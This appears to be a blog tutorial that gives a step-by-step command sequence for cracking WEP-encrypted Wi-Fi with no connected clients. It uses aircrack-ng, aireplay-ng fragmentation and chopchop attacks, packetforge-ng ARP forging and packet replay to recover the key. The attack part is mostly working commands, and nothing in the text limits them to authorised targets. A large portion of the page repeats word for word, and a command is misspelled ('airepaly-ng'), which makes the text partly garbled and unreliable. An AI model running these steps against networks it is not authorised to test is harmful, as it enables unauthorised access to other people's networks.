WIFI PENTESTING : HACK WEP ENCRYPTED WIFI WITH NO CONNECTED CLIENTS
This tutorial explains how easy it is to bypass a wep encryption of a wifi having no connected clients. WEP encryption is very easy to get bypassed and it doesn't matter whether a client is connected to the access point or not. In this video we are going to show the fragmentation attack, however it might be possible that it doesn't work on some routers. But if not this one, then any other (like chopchop) will surely work, which I will demonstrate in coming videos. Hence you are nowhere safe with WEP.
The main motive is to captured IVs (#Data). But, since there is no connected client therefore the AP will not be transmitting data and hence we need chopchop or fragmentation attack to speed up things.
For detailed into check the video below, which explains everything step by step.
We are going to discuss two methods of hacking WEP with no connected clients :
1. Chopchop Attack
2. Fragmentation Attack
Okay, open a TERMINAL :
1. Type " airmon-ng check kill "
2. Type " airmon-ng start wlan0 "
3. Type " airodump-ng wlan0mon "
Press CTRL+C as you your target router in the list.
4. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
CH is the channel of target.
BSSID is the MAC address of target.
dumpfile is the .cap file in which captured data will be saved. (name it as you like)
Open a new TERMINAL.
5. Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Success looks like this:
6. In this step we will use Chopchop attack or fragmentation attack to obtain PRGA.
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
I am going to cover fragmentation attack first.
Type " airepaly-ng -5 -b BSSID -h MACADD wlan0mon "
where
The main motive is to captured IVs (#Data). But, since there is no connected client therefore the AP will not be transmitting data and hence we need chopchop or fragmentation attack to speed up things.
For detailed into check the video below, which explains everything step by step.
We are going to discuss two methods of hacking WEP with no connected clients :
1. Chopchop Attack
2. Fragmentation Attack
Check this video for detailed information :
Okay, open a TERMINAL :
1. Type " airmon-ng check kill "
2. Type " airmon-ng start wlan0 "
3. Type " airodump-ng wlan0mon "
Press CTRL+C as you your target router in the list.
4. Type " airodump-ng -c CH --bssid BSSID -w dumpfile wlan0mon "
CH is the channel of target.
BSSID is the MAC address of target.
dumpfile is the .cap file in which captured data will be saved. (name it as you like)
Open a new TERMINAL.
5. Type " aireplay-ng -1 0 -a BSSID wlan0mon "
Success looks like this:
18:18:20 Sending Authentication Request 18:18:20 Authentication successful 18:18:20 Sending Association Request 18:18:20 Association successful :-)
6. In this step we will use Chopchop attack or fragmentation attack to obtain PRGA.
The objective of the chopchop and fragmentation attacks is to obtain a PRGA (pseudo random generation algorithm) file. This PRGA is not the WEP key and cannot be used to decrypt packets. However, it can be used to create new packets for injection. The creation of new packets will be covered later in the tutorial.
I am going to cover fragmentation attack first.
Type " airepaly-ng -5 -b BSSID -h MACADD wlan0mon "
where
- -5 means the fragmentation attack
- -b BSSID is the access point MAC address
- -h MACADD is the MAC address of our card and must match the MAC used in the fake authentication
The system will respond :
Use this packet ? y <ENTER>
When successful the system responds :
The fargment-XXXXXXX.xor file will be used in next step to generate arp packet.
Chopchop attack : if fragmentation attack fails then try chopchop attack
Type " aireplay-ng -4 -b BSSID -h MACADD wlan0mon "
7. Type " packetforge-ng -0 -a BSSID -h MACADD -k 255.255.255.255 -l 255.255.255.255 -y xorfile -w arp-request "
where
- -0 means generate an arp packet
- -a BSSID is the access point MAC address
- -h MACADD is MAC address of our card
- -k 255.255.255.255 is the destination IP (most APs respond to 255.255.255.255)
- -l 255.255.255.255 is the source IP (most APs respond to 255.255.255.255)
- -y fragment-0203-180343.xor is file to read the PRGA from (NOTE: Change the file name to the actual file name out in step 4 above)
- -w arp-request is name of file to write the arp packet to
8. Type " aireplay-ng -2 -h MACADD -r arp-request wlan0mon "
Use this packet ? y <ENTER>
The #Data count will now increase dramatically.
9. Open a new TERMINAL.
Type " aircrack-ng dumpfile "
Thats it !
Aircrack will reveal the key as soon as it gets sufficient IVs.
Comments
Post a Comment